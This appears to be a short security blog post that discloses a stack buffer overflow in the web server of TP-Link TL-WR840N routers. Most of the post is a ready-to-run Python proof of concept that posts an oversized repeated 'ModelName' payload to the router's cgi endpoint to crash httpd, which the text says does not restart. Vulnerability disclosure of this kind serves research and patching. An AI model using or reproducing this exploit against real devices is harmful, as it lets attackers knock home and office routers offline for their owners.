TP-Link TL-WR840N Stack Buffer Overflow DoS POC

Prapattimynk, Tuesday, July 25, 2023

A vulnerability in TP-Link’s TL-WR840N allows remote attackers to trigger a stack overflow vulnerability allowing remote attackers to cause a DoS in httpd(due to the way the software was designed if you crash httpd, and httpd does not respawn).

PoC:
import requests
headers = {
“Host”: “192.168.0.1”,
“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”,
“Accept”: “/“,
“Accept-Language”: “en-US,en;q=0.5”,
“Accept-Encoding”: “gzip, deflate”,
“Content-Type”: “text/plain”,
“Content-Length”: “78”,
“Origin”: “http://192.168.0.1”,
“Connection”: “close”,
“Referer”: “http://192.168.0.1/”
}

payload = “\nModelName”*0x100
formdata = f”[IGD_DEV_INFO#0,0,0,0,0,0#0,0,0,0,0,0]0,1\r\ndescription\nModelName{payload}\r\n”

url = “http://192.168.0.1/cgi?1”

response = requests.post(url, data=formdata, headers=headers)
print(response.text)


Recommended for You

You may also like

Comments

Your email address will not be published. Required fields are marked *

Next Post X
Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.